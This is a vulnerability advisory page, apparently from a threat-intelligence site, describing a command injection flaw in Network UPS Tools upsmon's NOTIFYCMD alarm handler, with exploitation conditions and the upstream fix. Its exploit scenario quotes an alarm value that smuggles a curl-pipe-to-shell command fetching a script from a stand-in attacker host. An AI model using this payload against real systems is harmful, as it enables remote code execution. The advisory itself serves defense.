Severity by source
AV:N for 3493/tcp network path; AC:H requires MitM or upsd compromise; PR:N needs no target auth; S:C since payload escapes upsmon process scope.
Estimated by vuln.today — no official severity rating has been published for this CVE yet.
Lifecycle Timeline
1Description PRE-NVD
AnalysisAI
Remote OS command injection in Network UPS Tools upsmon (versions 2.8.3-2.8.5) allows a network-positioned attacker - acting as a man-in-the-middle on the plaintext 3493/tcp NUT protocol connection, operating a compromised upsd server, or controlling a rogue UPS device - to execute arbitrary shell commands as the upsmon service account. The vulnerability exists in the NOTIFYCMD alarm handler, where server-supplied ups.alarm text is interpolated directly into a shell command string and executed via system(), enabling injection of shell metacharacters. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires two simultaneous conditions on the target: upsmon.conf must have NOTIFYCMD set to any external command, AND NOTIFYFLAG ALARM must include the EXEC flag - the reporter describes this combination as a common operational configuration. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Real-world risk is moderate-to-significant in environments where upsmon is deployed with NOTIFYCMD and EXEC-flagged ALARM notifications, which the advisory characterizes as a common operational pattern. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with access to the network segment carrying unencrypted NUT protocol traffic spoofs or intercepts the upsd response to a upsmon poll, injecting a crafted ups.alarm value such as 'Battery low$(curl http://attacker.example/implant.sh|sh)' into the ALARM notification. When upsmon receives the event and has NOTIFYFLAG ALARM EXEC configured, it constructs a shell command string by interpolating the alarm text via snprintf() and passes it to system(), causing the subshell expression to execute as the nut service account. … |
| Remediation | The upstream fix is available as GitHub PR #3499 (https://github.com/networkupstools/nut/pull/3499), which eliminates the vulnerable system() call by replacing it with execvp() on POSIX and _spawnvp() on Windows, passing the NOTIFYCMD and alarm text as an argv array so shell interpretation never occurs. … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
Within 24 hours: Inventory all systems running Network UPS Tools upsmon versions 2.8.3 through 2.8.5 and classify by criticality. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
Same technique Command Injection
View allShare
External POC / Exploit Code
Leaving vuln.today